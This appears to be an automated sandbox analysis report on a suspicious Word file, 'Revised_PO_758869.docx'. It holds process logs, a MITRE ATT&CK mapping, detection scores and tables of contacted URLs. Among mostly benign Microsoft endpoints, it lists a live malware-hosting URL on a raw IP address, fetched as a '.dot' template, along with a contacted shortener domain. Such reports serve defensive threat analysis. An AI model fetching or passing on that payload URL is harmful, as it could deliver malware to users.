Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEQueries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.accdb VolumeInformationJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEQueries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.laccdb VolumeInformationJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEQueries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.laccdb VolumeInformationJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsExploitation for Client Execution3DLL Side-Loading1Process Injection1Masquerading1OS Credential DumpingQuery Registry1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsDLL Side-Loading1Process Injection1LSASS MemoryFile and Directory Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)DLL Side-Loading1Security Account ManagerSystem Information Discovery11SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol14Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferIngress Tool Transfer3SIM Card SwapCarrier Billing Fraud

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
Revised_PO_758869.docx24%VirustotalBrowse
Revised_PO_758869.docx6%ReversingLabsDocument.Trojan.Heuristic

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
u.nu3%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://ofcrecsvcapi-int.azurewebsites.net/0%VirustotalBrowse
https://ofcrecsvcapi-int.azurewebsites.net/0%Avira URL Cloudsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
http://107.173.219.80/prf/regasm.dot100%Avira URL Cloudmalware
https://asgsmsproxyapi.azurewebsites.net/0%Avira URL Cloudsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://ovisualuiapp.azurewebsites.net/pbiagave/0%Avira URL Cloudsafe
https://directory.services.0%URL Reputationsafe
https://directory.services.0%URL Reputationsafe
https://directory.services.0%URL Reputationsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
u.nu
185.255.55.12
truetrueunknown

Contacted URLs

NameMaliciousAntivirus DetectionReputation
http://107.173.219.80/prf/regasm.dottrue
  • Avira URL Cloud: malware
unknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
https://api.diagnosticssdf.office.comA565DB19-BB03-40E7-A14A-DE7903488E69.0.drfalse
    high
    https://login.microsoftonline.com/A565DB19-BB03-40E7-A14A-DE7903488E69.0.drfalse
      high
      https://shell.suite.office.com:1443A565DB19-BB03-40E7-A14A-DE7903488E69.0.drfalse
        high
        https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorizeA565DB19-BB03-40E7-A14A-DE7903488E69.0.drfalse
          high
          https://autodiscover-s.outlook.com/A565DB19-BB03-40E7-A14A-DE7903488E69.0.drfalse
            high
            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FlickrA565DB19-BB03-40E7-A14A-DE7903488E69.0.drfalse
              high
              https://cdn.entity.A565DB19-BB03-40E7-A14A-DE7903488E69.0.drfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              https://api.addins.omex.office.net/appinfo/queryA565DB19-BB03-40E7-A14A-DE7903488E69.0.drfalse
                high
                https://clients.config.office.net/user/v1.0/tenantassociationkeyA565DB19-BB03-40E7-A14A-DE7903488E69.0.drfalse
                  high
                  https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/A565DB19-BB03-40E7-A14A-DE7903488E69.0.drfalse
                    high
                    https://powerlift.acompli.netA565DB19-BB03-40E7-A14A-DE7903488E69.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://rpsticket.partnerservices.getmicrosoftkey.comA565DB19-BB03-40E7-A14A-DE7903488E69.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://lookup.onenote.com/lookup/geolocation/v1A565DB19-BB03-40E7-A14A-DE7903488E69.0.drfalse
                      high
                      https://cortana.aiA565DB19-BB03-40E7-A14A-DE7903488E69.0.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechA565DB19-BB03-40E7-A14A-DE7903488E69.0.drfalse
                        high
                        https://cloudfiles.onenote.com/upload.aspxA565DB19-BB03-40E7-A14A-DE7903488E69.0.drfalse
                          high
                          https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileA565DB19-BB03-40E7-A14A-DE7903488E69.0.drfalse
                            high
                            https://entitlement.diagnosticssdf.office.comA565DB19-BB03-40E7-A14A-DE7903488E69.0.drfalse
                              high
                              https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicyA565DB19-BB03-40E7-A14A-DE7903488E69.0.drfalse
                                high
                                https://api.aadrm.com/A565DB19-BB03-40E7-A14A-DE7903488E69.0.drfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                https://ofcrecsvcapi-int.azurewebsites.net/A565DB19-BB03-40E7-A14A-DE7903488E69.0.drfalse
                                • 0%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                unknown
                                https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciesA565DB19-BB03-40E7-A14A-DE7903488E69.0.drfalse
                                  high
                                  https://api.microsoftstream.com/api/A565DB19-BB03-40E7-A14A-DE7903488E69.0.drfalse
                                    high
                                    https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=ImmersiveA565DB19-BB03-40E7-A14A-DE7903488E69.0.drfalse
                                      high
                                      https://cr.office.comA565DB19-BB03-40E7-A14A-DE7903488E69.0.drfalse
                                        high
                                        https://portal.office.com/account/?ref=ClientMeControlA565DB19-BB03-40E7-A14A-DE7903488E69.0.drfalse
                                          high
                                          https://ecs.office.com/config/v2/OfficeA565DB19-BB03-40E7-A14A-DE7903488E69.0.drfalse
                                            high
                                            https://graph.ppe.windows.netA565DB19-BB03-40E7-A14A-DE7903488E69.0.drfalse
                                              high
                                              https://res.getmicrosoftkey.com/api/redemptioneventsA565DB19-BB03-40E7-A14A-DE7903488E69.0.drfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              https://powerlift-frontdesk.acompli.netA565DB19-BB03-40E7-A14A-DE7903488E69.0.drfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              https://tasks.office.comA565DB19-BB03-40E7-A14A-DE7903488E69.0.drfalse
                                                high
                                                https://officeci.azurewebsites.net/api/A565DB19-BB03-40E7-A14A-DE7903488E69.0.drfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://sr.outlook.office.net/ws/speech/recognize/assistant/workA565DB19-BB03-40E7-A14A-DE7903488E69.0.drfalse
                                                  high
                                                  https://store.office.cn/addinstemplateA565DB19-BB03-40E7-A14A-DE7903488E69.0.drfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://outlook.office.com/autosuggest/api/v1/init?cvid=A565DB19-BB03-40E7-A14A-DE7903488E69.0.drfalse
                                                    high
                                                    https://globaldisco.crm.dynamics.comA565DB19-BB03-40E7-A14A-DE7903488E69.0.drfalse
                                                      high
                                                      https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechA565DB19-BB03-40E7-A14A-DE7903488E69.0.drfalse
                                                        high
                                                        https://store.officeppe.com/addinstemplateA565DB19-BB03-40E7-A14A-DE7903488E69.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://dev0-api.acompli.net/autodetectA565DB19-BB03-40E7-A14A-DE7903488E69.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://www.odwebp.svc.msA565DB19-BB03-40E7-A14A-DE7903488E69.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://api.powerbi.com/v1.0/myorg/groupsA565DB19-BB03-40E7-A14A-DE7903488E69.0.drfalse
                                                          high
                                                          https://web.microsoftstream.com/video/A565DB19-BB03-40E7-A14A-DE7903488E69.0.drfalse
                                                            high
                                                            https://graph.windows.netA565DB19-BB03-40E7-A14A-DE7903488E69.0.drfalse
                                                              high
                                                              https://dataservice.o365filtering.com/A565DB19-BB03-40E7-A14A-DE7903488E69.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://officesetup.getmicrosoftkey.comA565DB19-BB03-40E7-A14A-DE7903488E69.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://analysis.windows.net/powerbi/apiA565DB19-BB03-40E7-A14A-DE7903488E69.0.drfalse
                                                                high
                                                                https://prod-global-autodetect.acompli.net/autodetectA565DB19-BB03-40E7-A14A-DE7903488E69.0.drfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://outlook.office365.com/autodiscover/autodiscover.jsonA565DB19-BB03-40E7-A14A-DE7903488E69.0.drfalse
                                                                  high
                                                                  https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-iosA565DB19-BB03-40E7-A14A-DE7903488E69.0.drfalse
                                                                    high
                                                                    https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechA565DB19-BB03-40E7-A14A-DE7903488E69.0.drfalse
                                                                      high
                                                                      https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsonA565DB19-BB03-40E7-A14A-DE7903488E69.0.drfalse
                                                                        high
                                                                        https://ncus.contentsync.A565DB19-BB03-40E7-A14A-DE7903488E69.0.drfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        https://onedrive.live.com/about/download/?windows10SyncClientInstalled=falseA565DB19-BB03-40E7-A14A-DE7903488E69.0.drfalse
                                                                          high
                                                                          https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/A565DB19-BB03-40E7-A14A-DE7903488E69.0.drfalse
                                                                            high
                                                                            http://weather.service.msn.com/data.aspxA565DB19-BB03-40E7-A14A-DE7903488E69.0.drfalse
                                                                              high
                                                                              https://apis.live.net/v5.0/A565DB19-BB03-40E7-A14A-DE7903488E69.0.drfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asksA565DB19-BB03-40E7-A14A-DE7903488E69.0.drfalse
                                                                                high
                                                                                https://word.uservoice.com/forums/304948-word-for-ipad-iphone-iosA565DB19-BB03-40E7-A14A-DE7903488E69.0.drfalse
                                                                                  high
                                                                                  https://autodiscover-s.outlook.com/autodiscover/autodiscover.xmlA565DB19-BB03-40E7-A14A-DE7903488E69.0.drfalse
                                                                                    high
                                                                                    https://management.azure.comA565DB19-BB03-40E7-A14A-DE7903488E69.0.drfalse
                                                                                      high
                                                                                      https://wus2.contentsync.A565DB19-BB03-40E7-A14A-DE7903488E69.0.drfalse
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      https://incidents.diagnostics.office.comA565DB19-BB03-40E7-A14A-DE7903488E69.0.drfalse
                                                                                        high
                                                                                        https://clients.config.office.net/user/v1.0/iosA565DB19-BB03-40E7-A14A-DE7903488E69.0.drfalse
                                                                                          high
                                                                                          https://insertmedia.bing.office.net/odc/insertmediaA565DB19-BB03-40E7-A14A-DE7903488E69.0.drfalse
                                                                                            high
                                                                                            https://o365auditrealtimeingestion.manage.office.comA565DB19-BB03-40E7-A14A-DE7903488E69.0.drfalse
                                                                                              high
                                                                                              https://outlook.office365.com/api/v1.0/me/ActivitiesA565DB19-BB03-40E7-A14A-DE7903488E69.0.drfalse
                                                                                                high
                                                                                                https://api.office.netA565DB19-BB03-40E7-A14A-DE7903488E69.0.drfalse
                                                                                                  high
                                                                                                  https://incidents.diagnosticssdf.office.comA565DB19-BB03-40E7-A14A-DE7903488E69.0.drfalse
                                                                                                    high
                                                                                                    https://asgsmsproxyapi.azurewebsites.net/A565DB19-BB03-40E7-A14A-DE7903488E69.0.drfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://clients.config.office.net/user/v1.0/android/policiesA565DB19-BB03-40E7-A14A-DE7903488E69.0.drfalse
                                                                                                      high
                                                                                                      https://entitlement.diagnostics.office.comA565DB19-BB03-40E7-A14A-DE7903488E69.0.drfalse
                                                                                                        high
                                                                                                        https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.jsonA565DB19-BB03-40E7-A14A-DE7903488E69.0.drfalse
                                                                                                          high
                                                                                                          https://outlook.office.com/A565DB19-BB03-40E7-A14A-DE7903488E69.0.drfalse
                                                                                                            high
                                                                                                            https://storage.live.com/clientlogs/uploadlocationA565DB19-BB03-40E7-A14A-DE7903488E69.0.drfalse
                                                                                                              high
                                                                                                              https://templatelogging.office.com/client/logA565DB19-BB03-40E7-A14A-DE7903488E69.0.drfalse
                                                                                                                high
                                                                                                                https://outlook.office365.com/A565DB19-BB03-40E7-A14A-DE7903488E69.0.drfalse
                                                                                                                  high
                                                                                                                  https://webshell.suite.office.comA565DB19-BB03-40E7-A14A-DE7903488E69.0.drfalse
                                                                                                                    high
                                                                                                                    https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDriveA565DB19-BB03-40E7-A14A-DE7903488E69.0.drfalse
                                                                                                                      high
                                                                                                                      https://management.azure.com/A565DB19-BB03-40E7-A14A-DE7903488E69.0.drfalse
                                                                                                                        high
                                                                                                                        https://login.windows.net/common/oauth2/authorizeA565DB19-BB03-40E7-A14A-DE7903488E69.0.drfalse
                                                                                                                          high
                                                                                                                          https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFileA565DB19-BB03-40E7-A14A-DE7903488E69.0.drfalse
                                                                                                                          • URL Reputation: safe
